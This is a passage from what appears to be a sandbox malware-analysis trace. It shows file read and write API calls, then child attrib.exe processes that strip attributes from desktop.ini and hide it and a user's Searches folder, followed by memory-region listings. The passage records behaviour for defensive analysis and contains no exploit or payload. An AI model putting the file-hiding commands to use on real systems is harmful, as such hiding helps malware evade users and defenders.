lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] GetFileType (hFile=0x4c) returned 0x1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.628] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.628] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] GetFileType (hFile=0x4c) returned 0x1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] GetFileType (hFile=0x4c) returned 0x1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] GetFileType (hFile=0x4c) returned 0x1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] GetFileType (hFile=0x4c) returned 0x1 [0216.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.629] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.629] GetFileType (hFile=0x4c) returned 0x1 [0216.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.629] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.629] GetFileType (hFile=0x4c) returned 0x1 [0216.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.629] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.629] GetFileType (hFile=0x4c) returned 0x1 [0216.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.629] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.629] GetFileType (hFile=0x4c) returned 0x1 [0216.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.629] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.629] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.629] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] GetFileType (hFile=0x4c) returned 0x1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] GetFileType (hFile=0x4c) returned 0x1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] GetFileType (hFile=0x4c) returned 0x1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] GetFileType (hFile=0x4c) returned 0x1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] GetFileType (hFile=0x4c) returned 0x1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] GetFileType (hFile=0x4c) returned 0x1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.683] GetFileType (hFile=0x4c) returned 0x1 [0216.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.683] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.684] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.684] GetFileType (hFile=0x4c) returned 0x1 [0216.684] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.684] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.684] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.684] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.684] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.684] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x32, lpOverlapped=0x0) returned 1 [0216.684] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.684] GetFileType (hFile=0x4c) returned 0x1 [0216.684] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.684] GetFileType (hFile=0x4c) returned 0x1 [0216.684] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.684] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x32, lpOverlapped=0x0) returned 1 [0216.684] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.684] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.684] _close (_FileHandle=4) returned 0 [0216.684] FindNextFileW (in: hFindFile=0x280e50, lpFindFileData=0x1cf3d4 | out: lpFindFileData=0x1cf3d4) returned 0 [0216.685] GetLastError () returned 0x12 [0216.685] FindClose (in: hFindFile=0x280e50 | out: hFindFile=0x280e50) returned 1 [0216.685] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0216.685] _close (_FileHandle=3) returned 0 [0216.685] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.685] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0216.686] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.686] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3741ac | out: lpMode=0x4a3741ac) returned 1 [0216.686] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.686] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3741b0 | out: lpMode=0x4a3741b0) returned 1 [0216.686] SetConsoleInputExeNameW () returned 0x1 [0216.686] GetConsoleOutputCP () returned 0x1b5 [0216.686] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a374260 | out: lpCPInfo=0x4a374260) returned 1 [0216.686] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.686] exit (_Code=0) Process: id = "552" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ce0" os_pid = "0x170" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "549" os_parent_pid = "0x40c" cmd_line = "attrib -r -s -h \"C:\\Users\\Default\\Searches\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32290 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32291 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32292 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32293 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 32294 start_va = 0x760000 end_va = 0x766fff entry_point = 0x760000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 32295 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32296 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32297 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32298 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 32299 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32300 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32301 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32302 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32303 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 32304 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 32305 start_va = 0x71e50000 end_va = 0x71e6cfff entry_point = 0x71e50000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 32306 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32307 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32308 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32309 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32310 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32311 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32312 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32313 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32314 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32315 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32316 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32317 start_va = 0x130000 end_va = 0x1f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 32318 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32319 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 755 os_tid = 0xbcc Process: id = "553" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16340" os_pid = "0xc6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "549" os_parent_pid = "0x40c" cmd_line = "attrib +h \"C:\\Users\\Default\\Searches\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32320 start_va = 0x10000 end_va = 0x13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32321 start_va = 0x20000 end_va = 0x26fff entry_point = 0x20000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 32322 start_va = 0x30000 end_va = 0x4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 32323 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 32324 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 32325 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32326 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32327 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32328 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 32329 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32330 start_va = 0x30000 end_va = 0x3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32331 start_va = 0x40000 end_va = 0x4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32332 start_va = 0xa0000 end_va = 0x106fff entry_point = 0xa0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32333 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 32334 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 32335 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 32336 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32337 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32338 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32339 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32340 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32341 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32342 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32343 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32344 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32345 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32346 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32347 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 32348 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32349 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 756 os_tid = 0xbb4 Process: id = "554" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea166c0" os_pid = "0xc74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "549" os_parent_pid = "0x40c" cmd_line = "attrib +h \"C:\\Users\\Default\\Searches\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32350 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32351 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32352 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32353 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 32354 start_va = 0x350000 end_va = 0x356fff entry_point = 0x350000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 32355 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32356 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32357 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32358 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 32359 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32360 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32361 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32362 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32363 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 32364 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 32365 start_va = 0x71e50000 end_va = 0x71e6cfff entry_point = 0x71e50000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 32366 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32367 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32368 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32369 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32370 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32371 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32372 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32373 start_va = 0x76d70000 